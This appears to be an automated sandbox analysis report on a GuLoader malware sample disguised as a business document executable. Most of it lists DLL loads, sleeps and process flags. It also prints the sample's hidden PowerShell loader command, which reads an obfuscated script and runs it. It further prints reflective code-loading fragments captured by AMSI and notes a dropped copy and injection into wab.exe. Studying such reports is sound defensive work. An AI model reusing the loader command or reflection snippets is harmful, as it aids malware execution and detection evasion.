Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Q20240425 MAX5073626.com.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdbMn source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000001.00000002.2185997052.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lambda_methodCore.pdbt/ source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2195976842.000000000A319000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Frakkelommes $Recirkuleringers $Noting), (Discoloring @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Brainard = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fusel)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bidragsberettigedes, $false).DefineType($Overdriven

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"			Jump to behavior

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D43895 push cs; ret	1_2_08D438C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4E0B6 push esp; ret	1_2_08D4E0B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4D861 push 34977B93h; iretd	1_2_08D4D89C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4CC01 push cs; ret	1_2_08D4CC10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4B9DD push esi; ret	1_2_08D4B9DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4AD72 push cs; ret	1_2_08D4AD88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D45A98 push ebx; retf	1_2_08D45AA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4AAA0 push ecx; retf	1_2_08D4AACB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D45252 push ebx; iretd	1_2_08D45253
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4AA79 push cs; ret	1_2_08D4AA7C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4DE0B pushad ; ret	1_2_08D4DE19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4AE3D push cs; ret	1_2_08D4AE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D4576E push es; retf	1_2_08D45774
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08D45306 push es; retf	1_2_08D45308
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6B9DD push esi; ret	7_2_03E6B9DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6576E push es; retf	7_2_03E65774
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6AD72 push cs; ret	7_2_03E6AD88
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E65306 push es; retf	7_2_03E65308
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6AAA0 push ecx; retf	7_2_03E6AACB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6E0B6 push esp; ret	7_2_03E6E0B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E63895 push cs; ret	7_2_03E638C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E65A98 push ebx; retf	7_2_03E65AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6D861 push 34977B93h; iretd	7_2_03E6D89C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6AA79 push cs; ret	7_2_03E6AA7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E65252 push ebx; iretd	7_2_03E65253
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6AE3D push cs; ret	7_2_03E6AE40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6CC01 push cs; ret	7_2_03E6CC10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 7_2_03E6DE0B pushad ; ret	7_2_03E6DE19

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6645	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3197	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3490	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 6181	Jump to behavior

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

Evaded block: after key decision

graph_0-3570

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5064	Thread sleep count: 3490 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596	Thread sleep time: -93000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596	Thread sleep count: 6181 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596	Thread sleep time: -18543000s >= -30000s	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 3490 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Code function: 0_2_0040673F GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040673F
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Code function: 0_2_004065F5 FindFirstFileW,FindClose,	0_2_004065F5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

